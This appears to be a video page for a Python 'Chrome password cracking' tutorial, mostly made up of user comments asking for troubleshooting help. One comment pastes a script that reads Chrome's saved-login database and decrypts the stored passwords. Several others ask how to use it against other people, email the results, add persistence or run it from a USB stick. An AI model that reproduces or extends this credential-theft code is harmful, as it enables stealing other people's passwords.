Python Tutorial - || Google Chrome Browser/Database Cracking || Code Walk-through || Hacking ||

Python Tutorial - || Google Chrome Browser/Database Cracking || Code Walk-through || Hacking ||

w3w3w3

5 лет назад

32,123 Просмотров

Ссылки и html тэги не поддерживаются


Комментарии:

@JakeMason-bp3hh
@JakeMason-bp3hh - 29.08.2023 09:54

it says database is locked when i try to run it

Ответить
@martinsnwegwu4621
@martinsnwegwu4621 - 15.05.2023 16:53

How to add email?

Ответить
@networksecurity7985
@networksecurity7985 - 25.10.2022 18:05

It's shows error name not defined name

Ответить
@TheOzone125_official
@TheOzone125_official - 27.08.2022 21:44

Wait can I send this to someone and could there password be grabbed?

Ответить
@nickbarnes5704
@nickbarnes5704 - 11.07.2022 07:15

i'm new here, i was wondering if by any chance someone could tell me what is the app, exe or whatever running in the background, i mean the one were all the scripts goes, please?

Ответить
@toknn
@toknn - 06.07.2022 13:51

it says 'CryptUnprotectData', 'The parameter is incorrect.'

Ответить
@toknn
@toknn - 06.07.2022 13:47

does this still work?

Ответить
@snino8075
@snino8075 - 29.04.2022 07:55

could you link your discord again please?

Ответить
@leighgilbert1420
@leighgilbert1420 - 19.11.2021 16:43

You are the best instructor ever!

Ответить
@faceitlevel1035
@faceitlevel1035 - 27.08.2021 22:16

How can I do it to someone else,what I mean by that is,how can I find others saved chrome passwords?

Ответить
@nah959
@nah959 - 13.07.2021 13:45

cool vido

Ответить
@zainjadoon759
@zainjadoon759 - 18.04.2021 19:38

hey, did you check if it still works, and if it does not, could you tell me how chrome 80 encrypts the password database so I could try to do it on my own

Ответить
@marcelogrsp
@marcelogrsp - 02.04.2021 14:27

Why am I getting (87, 'CryptProtectData', 'The parameter is incorrect.') at row pwd = win32crypt.CryptUnprotectData(pwd)??

Ответить
@officialberend5335
@officialberend5335 - 02.03.2021 11:18

Why it says no module named win32crypt

Ответить
@ThEwAvEsHaPa
@ThEwAvEsHaPa - 23.02.2021 19:53

great video, is this possible to do with firefox? does firefox store credentials in a different way to chrome

Ответить
@easyasmalt7480
@easyasmalt7480 - 19.02.2021 02:32

pwd = win32crypt.CryptUnprotectData(pwd)
pywintypes.error: (87, 'CryptProtectData', 'The parameter is incorrect.')

helppppppppppppppppppppppppp

Ответить
@gabrielhernandez2338
@gabrielhernandez2338 - 12.02.2021 20:22

Please, I have not Google Chrome directory, what can i do??

Ответить
@codewithyug1129
@codewithyug1129 - 31.01.2021 05:59

Thanks bro, I forgot one of my scratch account's passwords but using this method I can extract it easily

Ответить
@rajivroy4549
@rajivroy4549 - 15.01.2021 22:03

Hii bro how can i contact with u?

Ответить
@hashirkashif8583
@hashirkashif8583 - 12.01.2021 18:33

Reply me , when you become famous !

Ответить
@chriskyle8562
@chriskyle8562 - 02.11.2020 14:57

Is giving me an error: no module named win32crypt, pls help.

Ответить
@dartl7830
@dartl7830 - 19.10.2020 22:23

Doesn’t work already

Ответить
@ByOakk
@ByOakk - 23.09.2020 22:56

Awesome man!! your a legend

Ответить
@andarielbaal3405
@andarielbaal3405 - 26.08.2020 02:18

It is now working oh chrome version 80 and higher. You can't decrypt it with only win32crypt, do you have a solution for that?

Ответить
@solved5928
@solved5928 - 05.08.2020 20:43

How do I find the database in my file explorer ?

Ответить
@FunnyPantsTV124
@FunnyPantsTV124 - 22.06.2020 04:19

Hey man great easy to follow tutorial as always!

i got an this error code when running the code "OperationalError: database is locked" is there a work around for this?

Ответить
@jesusheist7723
@jesusheist7723 - 09.06.2020 07:10

I'm loving this python playlist. You deserve the best.

Ответить
@idol2010
@idol2010 - 17.05.2020 22:11

(13, 'CryptProtectData', 'The data is invalid.')

Ответить
@davidfarah
@davidfarah - 13.04.2020 22:53

it says (87, 'CryptProtectData', 'The parameter is incorrect.') when i run it for chrome 80. Does it still work?

Ответить
@tem6686
@tem6686 - 10.04.2020 07:23

Please help me. I wrote the code just like you showed in the video and everytime i try and run it either in cmd, Windows PowerShell, Python i get a Syntax Error I don't Know why
here is my code if you need to to take a look at it










'''imports'''
import os
import sqlite3
import win32crypt


def get_chrome():
data_path = os.path.expanduser('~') + r'\AppData\Local\Google\Chrome\User Data\Default\Login Data'
c = sqlite3.connect(data_path)
cursor = c.cursor()
select_statement = 'SELECT origin_url, username_value, password_value FROM Logins'
cursor.execute(select_statement)

login_data = cursor.fetchall()

cred = {}

string = ''

for url, user_name, pwd in login_data:
pwd = win32crypt.CryptUnprotectData(pwd)
cred[url] = (user_name, pws[1] decode('utf8'))
string += '\n[+] URL:%s USERNAME:%s PASSWORD%s\n' % (url,user_name,pwd[1].decode('utf8'))
print(string)


if __name__=='__main__':
get_chrome()

Ответить
@yourbasicknowledge3681
@yourbasicknowledge3681 - 08.04.2020 15:06

It states "pywintypes.error: (87, 'CryptProtectData', 'The parameter is incorrect.')"

Ответить
@ArjanP
@ArjanP - 13.03.2020 00:30

I cant seem to integrate this with the logger mailing system, i would love this with a mailing and self destruct system (also start on pc restart etc) can you make a follow up video on a more advanced version of this? :)

Ответить
@michaelvasilevsky3801
@michaelvasilevsky3801 - 17.01.2020 11:19

Hi, sorry for my english. There was a problem trying to play this script. I myself recently work in python. installed the pipy module for win32crypt to work properly. at startup it says that the win32crypt ImportError module was not found: DLL load failed while importing ...

Ответить
@cedric6941
@cedric6941 - 16.01.2020 17:10

you just got a new sub this is dope

Ответить
@hackermeme5410
@hackermeme5410 - 13.01.2020 16:08

yes! nice

Ответить
@updated5202
@updated5202 - 12.01.2020 07:06

i get an error which suggests database locked

Ответить
@kineticstishi
@kineticstishi - 18.12.2019 21:58

how do I get win32crypt

Ответить
@wildiwt
@wildiwt - 13.12.2019 18:23

How do i download win32crypt because i have pywin32 i think but still not working i have python 3.8

Ответить
@iamstyled5292
@iamstyled5292 - 21.11.2019 04:44

why do i get the "sqlite3.OperationalError: unable to open database file"

Ответить
@NakedTrashPanda
@NakedTrashPanda - 07.10.2019 08:09

for anyone having the issue with "win32cyrpt" type this is "pip install pywin32" and it will fix it.

Ответить
@israonblitz434
@israonblitz434 - 27.09.2019 12:40

Great tutorial man, love it. Need a hand with a little something. Could you rewrite this, but make it send the output passwords as a .txt file, then sent to an email? Ive referred to your Keylogger tutorial for the smtp guide, but im still having trouble. Thanks in advance.

Ответить
@cjn9ne
@cjn9ne - 13.04.2019 12:01

What would you have to add to the program to make it run automatically when it is plugged into a PC (via USB)? Portable Python doesn't exist anymore, and the alternatives don't contain the right modules, and I don't know how to add the required modules to the portable python alternatives.


I am trying to get it to work this way:
1. USB drive is plugged into a PC
2. The code executes automatically, and the data gathered is stored in a text file titled "Googlehack.txt" (I viewed a previous question in the comments section of this video)
3. Program notifies the user that it is finished
4. User ejects the USB drive, with data stored on it


The problem with this is that not all computers have Python installed, and most don't have the correct modules.


How would I get all of this to work, starting from the code given in this video?

Ответить
@TheChrist559
@TheChrist559 - 07.03.2019 02:38

Hey bro remember me when you become bigger!! Like seriously!

Ответить